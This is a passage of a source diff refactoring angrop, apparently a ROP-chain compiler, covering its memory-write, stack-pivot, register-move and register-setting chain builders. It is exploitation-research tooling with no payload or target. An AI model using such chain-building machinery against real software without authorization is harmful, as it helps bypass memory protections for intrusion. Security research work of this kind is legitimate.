in self._mem_write_chain_cache[gadget]: + if cache_chain.changed_regs.intersection(preserve_regs): + continue + chain = cache_chain.concretize(addr_val, data) + state = chain.exec() + sim_data = state.memory.load(addr_val.data, len(data)) + if state.solver.eval(sim_data, cast_to=bytes) == data: + return chain + l.error("write_to_mem_with_gadget_with_cache failed: %s %s %s\n%s\n%s", addr_val, + data, preserve_regs, gadget.dstr(), sim_data) + continue + return self._write_to_mem_with_gadget(gadget, addr_val, data, preserve_regs) - def _write_to_mem_with_gadget(self, gadget, addr_val, data, use_partial_controllers=False): + def _write_to_mem_with_gadget(self, gadget, addr_val, data, preserve_regs): """ addr_val is a RopValue """ addr_bvs = claripy.BVS("addr", self.project.arch.bits) - - # sanity check for simple gadget - if len(gadget.mem_writes) != 1 or len(gadget.mem_reads) + len(gadget.mem_changes) > 0: - raise RopException("too many memory accesses for my lazy implementation") - - if use_partial_controllers and len(data) < self.project.arch.bytes: - data = data.ljust(self.project.arch.bytes, b"\x00") + mem_write = gadget.mem_writes[0] + all_deps = mem_write.addr_dependencies | mem_write.data_dependencies # constrain the successor to be at the gadget # emulate 'pop pc' - test_state = self.make_sim_state(gadget.addr) + test_state = self.make_sim_state(gadget.addr, gadget.stack_change//self.project.arch.bytes) # step the gadget pre_gadget_state = test_state state = rop_utils.step_to_unconstrained_successor(self.project, pre_gadget_state) # constrain the write - mem_write = gadget.mem_writes[0] the_action = None for a in state.history.actions.hardcopy: if a.type != "mem" or a.action != "write": @@ -218,8 +336,7 @@ def _write_to_mem_with_gadget(self, gadget, addr_val, data, use_partial_controll set(rop_utils.get_ast_dependency(a.data.ast)) == set(mem_write.data_dependencies): the_action = a break - - if the_action is None: + else: raise RopException("Couldn't find the 
matching action") # constrain the addr @@ -232,10 +349,11 @@ def _write_to_mem_with_gadget(self, gadget, addr_val, data, use_partial_controll test_state.add_constraints(state.memory.load(addr_val.data, len(data)) == claripy.BVV(data)) # get the actual register values - all_deps = list(mem_write.addr_dependencies) + list(mem_write.data_dependencies) reg_vals = {} + new_addr_val = None + constrained_addrs = None name = addr_bvs._encoded_name.decode() - for reg in set(all_deps): + for reg in all_deps: var = test_state.solver.eval(test_state.registers.load(reg)) # check whether this reg will propagate to addr # if yes, propagate its rebase value @@ -252,29 +370,22 @@ def _write_to_mem_with_gadget(self, gadget, addr_val, data, use_partial_controll if addr_val._rebase: var.rebase_ptr() var._rebase = True + new_addr_val = var break reg_vals[reg] = var - - chain = self._set_regs(**reg_vals) - chain.add_gadget(gadget) - - bytes_per_pop = self.project.arch.bytes - pc_offset = None - if gadget.transit_type == 'pop_pc': - pc_offset = gadget.pc_offset - else: - raise ValueError(f"Unknown gadget transit_type: {gadget.transit_type}") - - for idx in range(gadget.stack_change // bytes_per_pop): - if idx == pc_offset//bytes_per_pop: - next_pc_val = rop_utils.cast_rop_value( - chain._blank_state.solver.BVS("next_pc", self.project.arch.bits), - self.project, - ) - chain.add_value(next_pc_val) - continue - chain.add_value(self._get_fill_val()) + # if this address is set by stack + if new_addr_val is None: + constrained_addrs = [addr_val.data] + + chain = self.set_regs(**reg_vals, preserve_regs=preserve_regs) + chain = RopBlock.from_chain(chain) + chain = self._build_reg_setting_chain([chain, gadget], {}, constrained_addrs=constrained_addrs) + for idx, val in enumerate(chain._values): + if not val.symbolic and new_addr_val is not None and not new_addr_val.symbolic and \ + val.concreted == new_addr_val.concreted: + chain._values[idx] = new_addr_val + break # verify the write actually 
works state = chain.exec() @@ -288,3 +399,56 @@ def _write_to_mem_with_gadget(self, gadget, addr_val, data, use_partial_controll if not set(state.regs.pc.variables).pop().startswith("next_pc_"): raise RopException("the next pc is not in our control!") return chain + + ##### Main Entrance ##### + def write_to_mem(self, addr, data, preserve_regs=None, fill_byte=b"\xff"): + """ + main function + 1. do parameter sanitization + 2. cutting the data to smaller pieces to handle bad bytes in the data + """ + if preserve_regs is None: + preserve_regs = set() + + # sanity check + if not (isinstance(fill_byte, bytes) and len(fill_byte) == 1): + raise RopException("fill_byte is not a one byte string, aborting") + if not isinstance(data, bytes): + raise RopException("data is not a byte string, aborting") + if ord(fill_byte) in self.badbytes: + raise RopException("fill_byte is a bad byte!") + if isinstance(addr, RopValue) and addr.symbolic: + raise RopException("cannot write to a symbolic address") + + # split the string into smaller elements so that we can + # handle bad bytes + if all(x not in self.badbytes for x in data): + elems = [data] + else: + elems = [] + e = b'' + for x in data: + if x not in self.badbytes: + e += bytes([x]) + else: + if e: + elems.append(e) + elems.append(bytes([x])) + e = b'' + if e: + elems.append(e) + + # do the write + offset = 0 + chain = RopChain(self.project, self, badbytes=self.badbytes) + for elem in elems: + ptr = addr + offset + if self._word_contain_badbyte(ptr): + raise RopException(f"{ptr} contains bad byte!") + if len(elem) != 1 or ord(elem) not in self.badbytes: + chain += self._write_to_mem(ptr, elem, preserve_regs=preserve_regs, fill_byte=fill_byte) + offset += len(elem) + else: + chain += self._write_to_mem(ptr, elem, preserve_regs=preserve_regs, fill_byte=fill_byte) + offset += 1 + return chain diff --git a/angrop/chain_builder/pivot.py b/angrop/chain_builder/pivot.py index 840f72d9..70761c37 100644 --- 
a/angrop/chain_builder/pivot.py +++ b/angrop/chain_builder/pivot.py @@ -44,7 +44,7 @@ def pivot_addr(self, addr): for gadget in self._pivot_gadgets: # constrain the successor to be at the gadget # emulate 'pop pc' - init_state = self.make_sim_state(gadget.addr) + init_state = self.make_sim_state(gadget.addr, gadget.stack_change_before_pivot//self.project.arch.bytes+1) # step the gadget final_state = rop_utils.step_to_unconstrained_successor(self.project, init_state) @@ -61,13 +61,12 @@ def pivot_addr(self, addr): # iterate through the stack values that need to be in the chain sp = init_state.regs.sp arch_bytes = self.project.arch.bytes - for i in range(gadget.stack_change // arch_bytes): + for i in range(gadget.stack_change_before_pivot // arch_bytes): sym_word = init_state.memory.load(sp + arch_bytes*i, arch_bytes, endness=self.project.arch.memory_endness) - val = final_state.solver.eval(sym_word) chain.add_value(val) - state = chain.exec() + state = chain.exec(stop_at_pivot=True) if state.solver.eval(state.regs.sp == addr.data): return chain except Exception: # pylint: disable=broad-exception-caught @@ -81,7 +80,7 @@ def pivot_reg(self, reg_val): if reg not in gadget.sp_reg_controllers: continue - init_state = self.make_sim_state(gadget.addr) + init_state = self.make_sim_state(gadget.addr, gadget.stack_change_before_pivot//self.project.arch.bytes) final_state = rop_utils.step_to_unconstrained_successor(self.project, init_state) chain = self.chain_builder.set_regs() @@ -97,9 +96,9 @@ def pivot_reg(self, reg_val): val = final_state.solver.eval(sym_word) chain.add_value(val) - state = chain.exec() + state = chain.exec(stop_at_pivot=True) variables = set(state.regs.sp.variables) - if len(variables) == 1 and variables.pop().startswith(f'reg_{reg}'): + if len(variables) == 1 and variables.pop().startswith(f'sreg_{reg}'): return chain else: chain_str = chain.dstr() @@ -109,25 +108,16 @@ def pivot_reg(self, reg_val): raise RopException(f"Fail to pivot the stack to 
{reg}!") - def _same_effect(self, g1, g2): - if g1.sp_controllers != g2.sp_controllers: - return False - if g1.stack_change != g2.stack_change: - return False - if g1.stack_change_after_pivot != g2.stack_change_after_pivot: - return False - return True - - def _better_than(self, g1, g2): - if g1.num_sym_mem_access > g2.num_sym_mem_access: - return False - if not g1.changed_regs.issubset(g2.changed_regs): - return False - if g1.isn_count > g2.isn_count: - return False - return True + def _effect_tuple(self, g): + v1 = tuple(sorted(g.sp_controllers)) + return (v1, g.stack_change, g.stack_change_after_pivot) + + def _comparison_tuple(self, g): + return (g.num_sym_mem_access, len(g.changed_regs), g.isn_count) def filter_gadgets(self, gadgets): - gadgets = [x for x in gadgets if not x.has_conditional_branch] + gadgets = [x for x in gadgets if not x.has_conditional_branch and \ + x.transit_type != 'jmp_reg' and \ + not x.has_symbolic_access()] gadgets = self._filter_gadgets(gadgets) return sorted(gadgets, key=functools.cmp_to_key(cmp)) diff --git a/angrop/chain_builder/reg_mover.py b/angrop/chain_builder/reg_mover.py index 38e3e9b8..93ff7304 100644 --- a/angrop/chain_builder/reg_mover.py +++ b/angrop/chain_builder/reg_mover.py @@ -1,5 +1,6 @@ import logging import itertools +import multiprocessing as mp from collections import defaultdict import networkx as nx @@ -7,39 +8,199 @@ from .builder import Builder from .. 
import rop_utils +from ..rop_gadget import RopGadget from ..rop_chain import RopChain from ..rop_block import RopBlock from ..errors import RopException -from ..rop_gadget import RopRegMove +from ..rop_effect import RopRegMove l = logging.getLogger(__name__) +_global_reg_mover = None # type: ignore +def _set_global_reg_mover(reg_mover, ptr_list): + global _global_reg_mover# pylint: disable=global-statement + _global_reg_mover = reg_mover + Builder.used_writable_ptrs = ptr_list + +def worker_func(t): + new_move, gadget = t + gadget.project = _global_reg_mover.project # type: ignore + pre_preserve = {new_move.from_reg} + post_preserve = {new_move.to_reg} + rb = _global_reg_mover.normalize_gadget(gadget, # type: ignore + pre_preserve=pre_preserve, + post_preserve=post_preserve) + solver = None + if rb is not None: + solver = rb._blank_state.solver + return new_move, gadget.addr, solver, rb + class RegMover(Builder): """ handle register moves such as `mov rax, rcx` """ def __init__(self, chain_builder): super().__init__(chain_builder) - self._reg_moving_blocks: set[RopBlock] = None # type: ignore + self._reg_moving_gadgets: list[RopGadget] = None # type: ignore + # TODO: clean up the mess of RopGadget and RopBlock + self._reg_moving_blocks: set[RopGadget|RopBlock] = None # type: ignore self._graph: nx.Graph = None # type: ignore + self._normalize_todos = {} def bootstrap(self): - reg_moving_gadgets = self.filter_gadgets(self.chain_builder.gadgets) - self._reg_moving_blocks = {g for g in reg_moving_gadgets if g.self_contained} + self._reg_moving_gadgets = sorted(self.filter_gadgets(self.chain_builder.gadgets), key=lambda g:g.stack_change) + self._reg_moving_blocks = {g for g in self._reg_moving_gadgets if g.self_contained} self._build_move_graph() + def build_normalize_todos(self): + """ + identify non-self-contained gadgets that can potentially improve + our register move graph + """ + self._normalize_todos = {} + todos = {} + for gadget in self._reg_moving_gadgets: + 
if gadget.self_contained: + continue + # check whether the gadget brings new_moves: + # 1. the edge doesn't exist at all + # 2. it moves more bits than all existing ones + # TODO: 3. fewer clobbered registers? + new_moves = [] + for m in gadget.reg_moves: + edge = (m.from_reg, m.to_reg) + if not self._graph.has_edge(*edge): + new_moves.append(m) + continue + edge_data = self._graph.get_edge_data(*edge) + if m.bits > edge_data['bits']: + new_moves.append(m) + continue + for new_move in new_moves: + if new_move in todos: + todos[new_move].append(gadget) + else: + todos[new_move] = [gadget] + + # only normalize best ones + to_remove = [] + for m1 in todos: + for m2 in todos: + if m1 == m2: + continue + if m1.from_reg == m2.from_reg and m1.to_reg == m2.to_reg and m1.bits < m2.bits: + to_remove.append(m1) + for m in to_remove: + del todos[m] + + # we use address as key here instead of gadget because the gadget + # returned by multiprocessing may be different from the original one + for m, gadgets in todos.items(): + for g in gadgets: + new_moves = [m for m in g.reg_moves if m in todos] + self._normalize_todos[g.addr] = (g, new_moves) + + def normalize_todos(self): + addrs = sorted(self._normalize_todos.keys()) + again = True + while again: + cnt = 0 + for addr in addrs: + # take different gadgets to maximize performance + g, new_moves = self._normalize_todos[addr] + if new_moves: + new_move = new_moves.pop() + cnt += 1 + yield new_move, g + if cnt == 0: + again = False + + def normalize_single_threaded(self): + for new_move, gadget in self.normalize_todos(): + gadget.project = self.project + pre_preserve = {new_move.from_reg} + post_preserve = {new_move.to_reg} + rb = self.normalize_gadget(gadget, pre_preserve=pre_preserve, post_preserve=post_preserve) + if rb is not None: + yield new_move, gadget.addr, rb + + def normalize_multiprocessing(self, processes): + with mp.Manager() as manager: + # HACK: ideally, used_ptrs should be a resource of each ropblock that can be 
reassigned + # when conflict happens. but currently, I'm being lazy and just make sure every pointer + # is different + ptr_list = manager.list(Builder.used_writable_ptrs) + initargs = (self, ptr_list) + with mp.Pool(processes=processes, initializer=_set_global_reg_mover, initargs=initargs) as pool: + for new_move, addr, solver, rb in pool.imap_unordered(worker_func, self.normalize_todos()): + if rb is None: + continue + state = rop_utils.make_symbolic_state(self.project, self.arch.reg_list, 0) + state.solver = solver + rb.set_project(self.project) + rb.set_builder(self) + rb._blank_state = state + yield new_move, addr, rb + Builder.used_writable_ptrs = list(ptr_list) + + def optimize(self, processes): + res = False + self.build_normalize_todos() + if processes == 1: + iterable = self.normalize_single_threaded() + else: + iterable = self.normalize_multiprocessing(processes) + for new_move, addr, rb in iterable: + # if we happen to have normalized another move, don't do it again + for m in rb.reg_moves: + todo_new_moves = self._normalize_todos[addr][1] + if m in todo_new_moves: + todo_new_moves.remove(m) + # now we have this new_move, remove it from the todo list + for m in rb.reg_moves: + for addr, tup in self._normalize_todos.items(): + new_moves = tup[1] + if m in new_moves: + new_moves.remove(m) + # we already normalized it, just use it as much as we can + if rb.popped_regs: + self.chain_builder._reg_setter._insert_to_reg_dict([rb]) + if not any(m == new_move for m in rb.reg_moves): + l.warning("normalizing \n%s does not yield any wanted new reg moving capability: %s", + rb.dstr(), + new_move) + continue + res = True + for move in rb.reg_moves: + edge = (move.from_reg, move.to_reg) + if self._graph.has_edge(*edge): + edge_data = self._graph.get_edge_data(*edge) + edge_blocks = edge_data['block'] + edge_blocks.append(rb) + edge_data['block'] = sorted(edge_blocks, key=lambda x: x.stack_change) + if move.bits > edge_data['bits']: + edge_data['bits'] = move.bits + 
else: + self._graph.add_edge(*edge, block=[rb], bits=move.bits) + return res + def _build_move_graph(self): self._graph = nx.DiGraph() graph = self._graph # each node is a register - graph.add_nodes_from(self.arch.reg_set) + graph.add_nodes_from(self.arch.reg_list) # an edge means there is a move from the src register to the dst register - objects = defaultdict(set) + objects = defaultdict(list) + max_bits_dict = defaultdict(int) for block in self._reg_moving_blocks: for move in block.reg_moves: - objects[(move.from_reg, move.to_reg)].add(block) - for key, val in objects.items(): - graph.add_edge(key[0], key[1], block=val) + edge = (move.from_reg, move.to_reg) + objects[edge].append(block) + if move.bits > max_bits_dict[edge]: + max_bits_dict[edge] = move.bits + for edge, val in objects.items(): + val = sorted(val, key=lambda g:g.stack_change) + graph.add_edge(edge[0], edge[1], block=val, bits=max_bits_dict[edge]) def verify(self, chain, preserve_regs, registers): """ @@ -57,7 +218,7 @@ def verify(self, chain, preserve_regs, registers): if act.type not in ("mem", "reg"): continue if act.type == 'mem': - if act.addr.ast.variables: + if act.addr.ast.variables and any(not x.startswith('sym_addr') for x in act.addr.ast.variables): l.exception("memory access outside stackframe\n%s\n", chain_str) return False if act.type == 'reg' and act.action == 'write': @@ -117,7 +278,7 @@ def run(self, preserve_regs=None, **registers): # sanity check preserve_regs = set(preserve_regs) if preserve_regs else set() - unknown_regs = set(registers.keys()).union(preserve_regs) - self.arch.reg_set + unknown_regs = set(registers.keys()).union(preserve_regs) - set(self.arch.reg_list) if unknown_regs: raise RopException("unknown registers: %s" % unknown_regs) @@ -162,21 +323,27 @@ def _find_relevant_blocks(self, target_moves): for move in target_moves: # only consider the shortest path # TODO: we should use longer paths if the shortest one does work - paths = nx.all_shortest_paths(graph, 
source=move.from_reg, target=move.to_reg) - block_gadgets = [] - for path in paths: - edges = zip(path, path[1:]) - edge_block_list = [] - for edge in edges: - edge_blocks = graph.get_edge_data(edge[0], edge[1])['block'] - edge_block_list.append(edge_blocks) - block_gadgets += list(itertools.product(*edge_block_list)) - - # now turn them into blocks - for gs in block_gadgets: - assert gs - rb = RopBlock.from_gadget_list(gs, self) - rop_blocks.add(rb) + try: + paths = nx.all_shortest_paths(graph, source=move.from_reg, target=move.to_reg) + block_gadgets = [] + for path in paths: + edges = zip(path, path[1:]) + edge_block_list = [] + for edge in edges: + edge_blocks = graph.get_edge_data(edge[0], edge[1])['block'] + edge_block_list.append(edge_blocks) + block_gadgets += list(itertools.product(*edge_block_list)) + + # now turn them into blocks + for gs in block_gadgets: + assert gs + # FIXME: we are using the _build_reg_setting_chain API to turn mixin lists to a RopBlock + # which is pretty wrong + chain = self._build_reg_setting_chain(gs, {}) + rb = RopBlock.from_chain(chain) + rop_blocks.add(rb) + except nx.exception.NetworkXNoPath as e: # type: ignore + raise RopException(f"There is no chain can move {move.from_reg} to {move.to_reg}") from e return rop_blocks def filter_gadgets(self, gadgets): @@ -184,24 +351,18 @@ def filter_gadgets(self, gadgets): filter gadgets having the same effect """ # first: filter out gadgets that don't do register move - gadgets = {g for g in gadgets if g.reg_moves and not g.has_conditional_branch} + gadgets = {g for g in gadgets if g.reg_moves and not g.has_conditional_branch and not g.has_symbolic_access()} gadgets = self._filter_gadgets(gadgets) new_gadgets = set(x for x in gadgets if any(y.from_reg != y.to_reg for y in x.reg_moves)) return new_gadgets - def _same_effect(self, g1, g2): - """ - having the same register moving effect compared to the other gadget - """ - if set(g1.reg_moves) != set(g2.reg_moves): - return False - if 
g1.reg_dependencies != g2.reg_dependencies: - return False - return True + def _effect_tuple(self, g): + v1 = tuple(sorted(g.reg_moves)) + v2 = [] + for x,y in g.reg_dependencies.items(): + v2.append((x, tuple(sorted(y)))) + v2 = tuple(sorted(v2)) + return (v1, v2) - def _better_than(self, g1, g2): - if g1.stack_change <= g2.stack_change and \ - g1.num_sym_mem_access <= g2.num_sym_mem_access and \ - g1.isn_count <= g2.isn_count: - return True - return False + def _comparison_tuple(self, g): + return (g.stack_change, g.num_sym_mem_access, rop_utils.transit_num(g), g.isn_count) diff --git a/angrop/chain_builder/reg_setter.py b/angrop/chain_builder/reg_setter.py index 50ac5f28..1cb1b507 100644 --- a/angrop/chain_builder/reg_setter.py +++ b/angrop/chain_builder/reg_setter.py @@ -1,9 +1,9 @@ -import heapq +import itertools import logging from collections import defaultdict, Counter -from typing import Iterable, Iterator +from functools import cmp_to_key -import claripy +import networkx as nx from angr.errors import SimUnsatError from .builder import Builder @@ -13,7 +13,7 @@ from ..rop_gadget import RopGadget from ..errors import RopException -l = logging.getLogger("angrop.chain_builder.reg_setter") +l = logging.getLogger(__name__) class RegSetter(Builder): """ @@ -22,23 +22,17 @@ class RegSetter(Builder): 2. algo2: pop-only bfs search, fast, reliable, can generate chains to bypass bad-bytes 3. algo3: riscy-rop inspired backward search, slow, can utilize gadgets containing conditional branches """ + + #### Inits #### def __init__(self, chain_builder): super().__init__(chain_builder) # all the gadgets that can set registers self._reg_setting_gadgets: set[RopGadget]= None # type: ignore self.hard_chain_cache: dict[tuple, list] = None # type: ignore # Estimate of how difficult it is to set each register. 
- self._reg_weights: dict[str, int] = None # type: ignore + # all self-contained and not symbolic access self._reg_setting_dict: dict[str, list] = None # type: ignore - def _insert_to_reg_dict(self, gs): - for rb in gs: - for reg in rb.popped_regs: - self._reg_setting_dict[reg].append(rb) - for reg in self._reg_setting_dict: - lst = self._reg_setting_dict[reg] - self._reg_setting_dict[reg] = sorted(lst, key=lambda x: x.stack_change) - def bootstrap(self): self._reg_setting_gadgets = self.filter_gadgets(self.chain_builder.gadgets) @@ -47,6 +41,8 @@ def bootstrap(self): for g in self._reg_setting_gadgets: if not g.self_contained: continue + if g.has_symbolic_access(): + continue for reg in g.popped_regs: self._reg_setting_dict[reg].append(g) self._insert_to_reg_dict([]) # sort reg dict @@ -54,64 +50,44 @@ def bootstrap(self): reg_pops = Counter() for gadget in self._reg_setting_gadgets: reg_pops.update(gadget.popped_regs) - self._reg_weights = { - reg: 5 if reg_pops[reg] == 0 else 2 if reg_pops[reg] == 1 else 1 - for reg in self.arch.reg_set - } self.hard_chain_cache = {} - def optimize(self): - # now we have a functional RegSetter, check whether we can do better - - # first, TODO: see whether we can use reg_mover to set hard-registers - - # second, see whether we can use non-self-contained gadgets to reduce stack-change requirements - # TODO: currently, we only support jmp_reg gadgets - bests = {} - for gadget in self._reg_setting_gadgets: - if gadget.self_contained: - continue - if gadget.has_conditional_branch: - continue - if gadget.transit_type != 'jmp_reg': - continue - stack_change = gadget.stack_change - if gadget.pc_reg not in self._reg_setting_dict: - continue - - # choose the best gadget to set the PC for this jmp_reg gadget - pc_setter = None - for g in self._reg_setting_dict[gadget.pc_reg]: - if g.has_symbolic_access(): - continue - pc_setter = g - break - if pc_setter is None: - continue - pc_setter_sc = pc_setter.stack_change - - for reg in 
gadget.popped_regs: - if gadget.pc_reg not in self._reg_setting_dict: - continue - total_sc = stack_change + pc_setter_sc - reg_sc = self._reg_setting_dict[reg][0].stack_change if reg in self._reg_setting_dict else 0xffffffff - if total_sc > reg_sc: - continue + #### Utility Functions #### + def _insert_to_reg_dict(self, gs): + for rb in gs: + for reg in rb.popped_regs: + self._reg_setting_dict[reg].append(rb) + for reg in self._reg_setting_dict: + lst = self._reg_setting_dict[reg] + self._reg_setting_dict[reg] = sorted(lst, key=lambda x: x.stack_change) - assert isinstance(pc_setter, RopGadget) - try: - chain = self._build_reg_setting_chain([pc_setter, gadget], None, {}, total_sc) - rb = RopBlock.from_chain(chain) - assert rb.stack_change == total_sc - if reg not in bests or rb.stack_change < bests[reg].stack_change: - bests[reg] = rb - elif rb.stack_change == bests[reg].stack_change and \ - bests[reg].num_sym_mem_access > rb.num_sym_mem_access: - bests[reg] = rb - except RopException: - pass - self._insert_to_reg_dict(bests.values()) + def _expand_ropblocks(self, mixins): + """ + expand simple ropblocks to gadgets so that we don't encounter solver conflicts + when using the same ropblock multiple times + """ + gadgets = [] + for mixin in mixins: + if isinstance(mixin, RopGadget): + gadgets.append(mixin) + elif isinstance(mixin, RopBlock): + if mixin._blank_state.solver.constraints: + try: + rb = self._build_reg_setting_chain(mixin._gadgets, {}) + rb = RopBlock.from_chain(rb) + if mixin.popped_regs.issubset(rb.popped_regs): + rb.pop_equal_set = mixin.pop_equal_set.copy() + gadgets += mixin._gadgets + continue + except RopException: + pass + gadgets.append(mixin) + else: + gadgets += mixin._gadgets + else: + raise ValueError(f"cannot turn {mixin} into RopBlock!") + return gadgets def verify(self, chain, preserve_regs, registers): """ @@ -124,7 +100,7 @@ def verify(self, chain, preserve_regs, registers): if act.type not in ("mem", "reg"): continue if act.type == 
'mem': - if act.addr.ast.variables: + if act.addr.ast.variables and any(not x.startswith('sym_addr') for x in act.addr.ast.variables): l.exception("memory access outside stackframe\n%s\n", chain_str) return False if act.type == 'reg' and act.action == 'write': @@ -133,14 +109,20 @@ def verify(self, chain, preserve_regs, registers): offset -= act.offset % self.project.arch.bytes reg_name = self.project.arch.translate_register_name(offset) if reg_name in preserve_regs: - l.exception("Somehow angrop thinks\n%s\ncan be used for the chain generation-1.\nregisters: %s", - chain_str, registers) + fmt = "Somehow angrop thinks\n%s\n" + fmt += "can be used for the chain generation-1.\n" + fmt += "registers: %s\n" + fmt += "preserve_regs: %s\n" + l.exception(fmt, chain_str, registers, preserve_regs) return False for reg, val in registers.items(): bv = getattr(state.regs, reg) if (val.symbolic != bv.symbolic) or state.solver.eval(bv != val.data): - l.exception("Somehow angrop thinks\n%s\ncan be used for the chain generation-2.\nregisters: %s", - chain_str, registers) + fmt = "Somehow angrop thinks\n%s\n" + fmt += "can be used for the chain generation-1.\n" + fmt += "registers: %s\n" + fmt += "preserve_regs: %s\n" + l.exception(fmt, chain_str, registers, preserve_regs) return False # the next pc must be marked as the next_pc if len(state.regs.pc.variables) != 1: @@ -148,322 +130,417 @@ def verify(self, chain, preserve_regs, registers): pc_var = set(state.regs.pc.variables).pop() return pc_var.startswith("next_pc") - @staticmethod - def _mixins_to_gadgets(mixins): - gadgets = [] - for mixin in mixins: - if isinstance(mixin, RopGadget): - gadgets.append(mixin) - elif isinstance(mixin, RopBlock): - gadgets += mixin._gadgets - else: - raise ValueError(f"cannot turn {mixin} into RopBlock!") - return gadgets + def can_set_reg(self, reg): + return bool(self._reg_setting_dict[reg]) - def run(self, modifiable_memory_range=None, preserve_regs=None, max_length=10, **registers): - if 
len(registers) == 0: - return RopChain(self.project, self, badbytes=self.badbytes) - - # sanity check - preserve_regs = set(preserve_regs) if preserve_regs else set() - unknown_regs = set(registers.keys()).union(preserve_regs) - self.arch.reg_set - if unknown_regs: - raise RopException("unknown registers: %s" % unknown_regs) + #### Graph Optimization #### + def _normalize_for_move(self, gadget, new_move): + """ + two methods: + 1. normalize it and hope the from_reg to be set during normalization + 2. normalize it and make sure the from_reg won't be clobbered during normalization and then prepend it + """ + rb = self.normalize_gadget(gadget, post_preserve={new_move.to_reg}, to_set_regs={new_move.from_reg}) + if rb is None: # if this does not exist, no need to try the more strict version + return None + if new_move.to_reg in rb.popped_regs: + return rb - # cast values to RopValue - for x in registers: - registers[x] = rop_utils.cast_rop_value(registers[x], self.project) + rb = self.normalize_gadget(gadget, pre_preserve={new_move.from_reg}, post_preserve={new_move.to_reg}) + if rb is None: + return None + reg_setter = self._reg_setting_dict[new_move.from_reg][0] + if isinstance(reg_setter, RopGadget): + reg_setter = RopBlock.from_gadget(reg_setter, self) + try: + rb = reg_setter + rb + except RopException: + l.error("reg_setter + rb fail to execute, plz raise an issue") + return None - for gadgets in self.iterate_candidate_chains(modifiable_memory_range, preserve_regs, max_length, registers): - chain_str = "\n".join(g.dstr() for g in gadgets) - l.debug("building reg_setting chain with chain:\n%s", chain_str) - stack_change = sum(x.stack_change for x in gadgets) - try: - gadgets = self._mixins_to_gadgets(gadgets) - chain = self._build_reg_setting_chain(gadgets, modifiable_memory_range, - registers, stack_change) - chain._concretize_chain_values(timeout=len(chain._values)*3) - if self.verify(chain, preserve_regs, registers): - 
#self._chain_cache[reg_tuple].append(gadgets) - return chain - except (RopException, SimUnsatError): - pass + return rb - raise RopException("Couldn't set registers :(") + def _should_normalize_reg_move(self, src, dst, shortest): + # we can't set the source register, no point in normalizing it + if src not in shortest: + return False + # situations we want to check + # 1. this is a hard register and we can set the source + # 2. the final chain is expected to be shorter than the best setter + # for the second scenario, we only check whether the move can be done in one step + mover_graph = self.chain_builder._reg_mover._graph + if not self._reg_setting_dict[dst] and self._reg_setting_dict[src]: + return True + edge = (src, dst) + if mover_graph.has_edge(edge[0], edge[1]): + edge_blocks = mover_graph.get_edge_data(edge[0], edge[1])['block'] + if edge_blocks[0].stack_change + shortest[src] < shortest[dst]: + return True + return False - def iterate_candidate_chains(self, modifiable_memory_range, preserve_regs, max_length, registers): - # algorithm1 - gadgets, _, _ = self.find_candidate_chains_graph_search(modifiable_memory_range=modifiable_memory_range, - preserve_regs=preserve_regs.copy(), - **registers) - if gadgets: - yield gadgets - - # algorithm2 - yield from self.find_candidate_chains_pop_only_bfs_search( - self._find_relevant_gadgets(allow_mem_access=False, **registers), - preserve_regs.copy(), - **registers) - - # algorithm3 - yield from self.find_candidate_chains_backwards_recursive_search( - self._reg_setting_gadgets, - set(registers), - current_chain=[], - preserve_regs=preserve_regs.copy(), - modifiable_memory_range=modifiable_memory_range, - visited={}, - max_length=max_length) - - #### Chain Building Algorithm 1: fast but unreliable graph-based search #### + def _can_set_reg_with_bits(self, reg, bits): + blocks = self._reg_setting_dict[reg] + for block in blocks: + pop = block.get_pop(reg) + if pop.bits >= bits: + return True + return False @staticmethod 
- def _tuple_to_gadgets(data, reg_tuple): - """ - turn the entry tuple in the graph search to a list of gadgets - """ - if reg_tuple in data: - gadgets_reverse = [] - curr_tuple = reg_tuple - else: - gadgets_reverse = reg_tuple[2] - curr_tuple = () - while curr_tuple != (): - gadgets_reverse.append(data[curr_tuple][2]) - curr_tuple = data[curr_tuple][0] - return gadgets_reverse[::-1] + def block_with_max_bit_moves(edge, edge_data): + blocks = edge_data['block'] + edge_bits = edge_data['bits'] + results = [] + for block in blocks: + for m in block.reg_moves: + if m.from_reg == edge[0] and m.to_reg == edge[1]: + break + else: + raise RuntimeError("????") + if m.bits == edge_bits: + results.append(block) + return results + + def _optimize_with_reg_moves(self): + # basically, we are looking for situations like this: + # 1) we can set register A to arbitrary value (in self._reg_setting_dict) AND + # 2) we can move register A to another register, preferably an unseen one + mover_graph = self.chain_builder._reg_mover._graph + rop_blocks = [] + shortest = {x:y[0].stack_change for x,y in self._reg_setting_dict.items() if y} + for src, dst in itertools.product(self._reg_setting_dict.keys(), self.arch.reg_list): + if src == dst: + continue - @staticmethod - def _verify_chain(chain, regs): - """ - make sure the new chain does not do bad memory accesses - """ - accesses = set() - for g in chain: - accesses.update(set(g.mem_reads + g.mem_writes + g.mem_changes)) - accesses = set(m for m in accesses if m.is_symbolic_access()) - for mem_access in accesses: - if mem_access.addr_controllers and not mem_access.addr_controllers.intersection(regs): - return False + if not self._should_normalize_reg_move(src, dst, shortest): + continue - return True + paths = nx.all_simple_paths(mover_graph, src, dst, cutoff=3) + all_chains = defaultdict(list) + for path in paths: + path_chain = [] + edges = zip(path, path[1:]) + path_bits = self.project.arch.bits + for edge in edges: + edge_data = 
mover_graph.get_edge_data(edge[0], edge[1]) + edge_bits = edge_data['bits'] + path_bits = min(path_bits, edge_bits) + # for each edge, take the shortest 5 blocks + edge_blocks = sorted(RegSetter.block_with_max_bit_moves(edge, edge_data), + key=lambda g: g.stack_change)[:5] + path_chain.append(edge_blocks) + setter_chain = [] + for setter in self._reg_setting_dict[src]: + pop = setter.get_pop(src) + if pop.bits >= path_bits: + setter_chain.append(setter) + if not setter_chain: + continue + path_chains = list(itertools.product(*([setter_chain]+path_chain))) + all_chains[path_bits] += path_chains - # todo allow user to specify rop chain location so that we can use read_mem gadgets to load values - # todo allow specify initial regs - # todo memcopy(from_addr, to_addr, len) - # todo handle "leave" then try to do a mem write on chess from codegate-finals - def find_candidate_chains_graph_search(self, modifiable_memory_range=None, use_partial_controllers=False, - max_stack_change=None, preserve_regs=None, **registers): - """ - Finds a list of gadgets which set the desired registers - This method currently only handles simple cases and will be improved later - :param registers: - :return: - """ - preserve_regs = set(preserve_regs) if preserve_regs else set() - search_regs = set(registers) - - if modifiable_memory_range is not None and len(modifiable_memory_range) != 2: - raise RopException("modifiable_memory_range should be a tuple (low, high)") - - # find gadgets with sufficient partial control - partial_controllers = {} - for r in registers: - partial_controllers[r] = set() - if use_partial_controllers: - partial_controllers = 